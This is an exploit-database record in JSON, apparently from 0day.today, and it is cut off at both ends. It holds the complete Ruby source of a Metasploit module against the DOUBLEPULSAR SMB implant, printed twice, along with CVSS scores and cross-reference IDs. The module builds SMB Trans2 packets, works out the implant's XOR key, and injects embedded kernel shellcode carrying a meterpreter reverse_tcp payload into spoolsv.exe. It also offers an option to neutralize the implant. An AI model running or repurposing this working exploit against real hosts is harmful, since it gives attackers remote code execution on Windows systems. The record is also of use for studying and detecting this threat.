Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-21T00:18:31", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "cbac6c153db5910b0687d3a0a89d555b", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-22T06:21:08", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-22T06:21:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-22T06:21:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 